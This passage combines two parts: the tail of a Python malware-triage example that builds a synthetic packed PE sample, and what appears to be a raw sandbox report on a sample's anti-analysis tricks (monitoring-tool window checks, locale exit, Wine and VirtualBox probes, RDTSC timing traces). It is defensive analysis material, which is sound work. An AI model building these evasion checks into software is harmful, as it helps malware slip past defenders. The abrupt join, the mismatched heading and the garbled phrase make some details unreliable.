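    (".text", b"\x90" * 0x1F0 + b"\xC3" * 0x10, SCN_EXECUTE | SCN_READ),
    ("nxusumaz", bytes(range(256)) * 64, SCN_EXECUTE | SCN_READ | SCN_WRITE),
    (".taggant", b"\x60\xE8\x00\x00\x00\x00\x5D".ljust(0x200, b"\0"), SCN_EXECUTE | SCN_READ | SCN_WRITE),
]


def demo() -> Dict[str, object]:
    return triage(build_sample_pe(SAMPLE_SECTIONS, ".taggant"))
```

On a real file run triage(open(path, "rb").read()); the checksum pass reads the whole file, which is fine for a 1.8 MB sample. The sample image stores a checksum of 0 so the mismatch fires; rebuilding it with the computed value clears that finding while the entropy, section-name and rights findings stay, which is the point: a packer can fix the checksum in one line, but it cannot make a 16-bit-entropy-8 section look like code.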

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13679; the process exits depending on the system language, which is the "may stop execution after checking locale" signature)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine (present only under Wine)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (the VirtualBox ACPI table name)
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1D68 second address: 7E1D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0DD3 second address: 7E0DDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0DDB second address: 7E0DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0EE8 second address: 7E0EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1176 second address: 7E117C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E117C second address: 7E119A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jmp 00007FECB125BFD5h 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E148B second address: 7E1494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E15FE second address: 7E160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FECB125BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E44A4 second address: 7E44A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E451D second address: 7E459C instructions: 0x00000000 rdtsc 0x00000002 je 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b add dword ptr [esp], 406280F1h 0x00000012 or ecx, dword ptr [ebp+122D3813h] 0x00000018 and edx, 10B23574h 0x0000001e push 00000003h 0x00000020 mov edi, eax 0x00000022 push 00000000h 0x00000024 jl 00007FECB125BFC7h 0x0000002a clc 0x0000002b push 00000003h 0x0000002d mov esi, dword ptr [ebp+122D38A3h] 0x00000033 push 8475F3E0h 0x00000038 push esi 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c pop edx 0x0000003d pop esi 0x0000003e add dword ptr [esp], 3B8A0C20h 0x00000045 mov dword ptr [ebp+122D2555h], eax 0x0000004b lea ebx, dword ptr [ebp+124563DBh] 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007FECB125BFC8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000019h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b mov ecx, edx 0x0000006d xchg eax, ebx 0x0000006e push eax 0x0000006f push edx 0x00000070 jnp 00007FECB125BFCCh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E459C second address: 7E45A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E45A0 second address: 7E45AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FECB125BFC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E45AA second address: 7E45BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4660 second address: 7E46ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FECB125BFCCh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FECB125BFCEh 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FECB125BFCBh 0x00000024 pop eax 0x00000025 jnc 00007FECB125BFD2h 0x0000002b je 00007FECB125BFCCh 0x00000031 mov edx, dword ptr [ebp+122D36CFh] 0x00000037 push 00000003h 0x00000039 xor edx, dword ptr [ebp+122D3963h] 0x0000003f push 00000000h 0x00000041 sbb si, AFE3h 0x00000046 push 00000003h 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FECB125BFC8h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 push AA5B6FECh 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E46ED second address: 7E4743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007FECB0CC2D06h 0x0000000d pop eax 0x0000000e popad 0x0000000f add dword ptr [esp], 15A49014h 0x00000016 jmp 00007FECB0CC2D19h 0x0000001b push esi 0x0000001c or edx, dword ptr [ebp+122D36F3h] 0x00000022 pop ecx 0x00000023 lea ebx, dword ptr [ebp+124563E4h] 0x00000029 xchg eax, ebx 0x0000002a jno 00007FECB0CC2D0Eh 0x00000030 push eax 0x00000031 push esi 0x00000032 jg 00007FECB0CC2D0Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E482D second address: 7E4855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007FECB125BFE4h 0x0000000f pushad 0x00000010 jmp 00007FECB125BFD6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4908 second address: 7E490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8039EA second address: 8039EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8039EE second address: 803A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007FECB0CC2D06h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007FECB0CC2D06h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803B7F second address: 803B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803B8A second address: 803B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803B8E second address: 803B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D22 second address: 803D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D2C second address: 803D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803E84 second address: 803E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803E8B second address: 803E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FECB125BFC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8042CD second address: 8042D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8045CF second address: 8045D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804736 second address: 80473B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80473B second address: 80474D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB125BFCEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80474D second address: 804751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804751 second address: 80475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FECB125BFCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8048CF second address: 8048D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804A3F second address: 804A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804A43 second address: 804A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FECB0CC2D12h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804BC3 second address: 804BE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FECB125BFD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007FECB125BFC6h 0x00000012 jp 00007FECB125BFC6h 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804BE7 second address: 804BEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804BEC second address: 804C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FECB125BFC6h 0x0000000f js 00007FECB125BFC6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F83EC second address: 7F83FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F83FB second address: 7F8406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FECB125BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8406 second address: 7F8422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB0CC2D16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4519 second address: 7D4535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FECB125BFCEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4535 second address: 7D453A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804D5E second address: 804D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804D62 second address: 804D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FECB0CC2D06h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804D70 second address: 804D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FECB125BFC6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FECB125BFD1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804D92 second address: 804DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FECB0CC2D17h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805831 second address: 805837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805837 second address: 80583B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805AB1 second address: 805AEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FECB125BFD2h 0x0000000c je 00007FECB125BFC6h 0x00000012 jmp 00007FECB125BFD9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805AEB second address: 805AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8080EC second address: 8080F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FECB125BFC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806A38 second address: 806A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FECB0CC2D0Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806A51 second address: 806A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 807242 second address: 80724D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FECB0CC2D06h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80835F second address: 808363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BCB9 second address: 80BCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB0CC2D16h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BCD3 second address: 80BCD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BCD7 second address: 80BCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BCDD second address: 80BCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D3A7 second address: 80D3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D3AB second address: 80D3D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECB125BFC6h 0x00000008 jmp 00007FECB125BFD4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FECB125BFCAh 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D3D3 second address: 80D3EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D11h 0x00000009 jbe 00007FECB0CC2D06h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D3EE second address: 80D3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0F46 second address: 7D0F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007FECB0CC2D0Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0F61 second address: 7D0F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0F65 second address: 7D0F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 812925 second address: 812929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 812929 second address: 812936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 812936 second address: 81296A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB125BFD9h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FECB125BFCDh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81296A second address: 812981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D11h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 812981 second address: 812985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 812AF3 second address: 812B01 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81309E second address: 8130A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8130A6 second address: 8130C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FECB0CC2D16h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8152CE second address: 8152D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8152D2 second address: 8152D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8152D6 second address: 81534E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 0E787B48h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FECB125BFC8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov edi, 7250A0D9h 0x0000002d call 00007FECB125BFC9h 0x00000032 jmp 00007FECB125BFD0h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a jns 00007FECB125BFC6h 0x00000040 pop eax 0x00000041 pop edx 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FECB125BFD9h 0x0000004b mov eax, dword ptr [eax] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815623 second address: 815647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jmp 00007FECB0CC2D11h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FECB0CC2D08h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815B29 second address: 815B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FECB125BFC6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816518 second address: 81651D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81651D second address: 81656C instructions: 0x00000000 rdtsc 0x00000002 js 00007FECB125BFC8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FECB125BFC8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D39A3h] 0x0000002d jmp 00007FECB125BFCCh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jo 00007FECB125BFCCh 0x0000003b jne 00007FECB125BFC6h 0x00000041 rdtsc
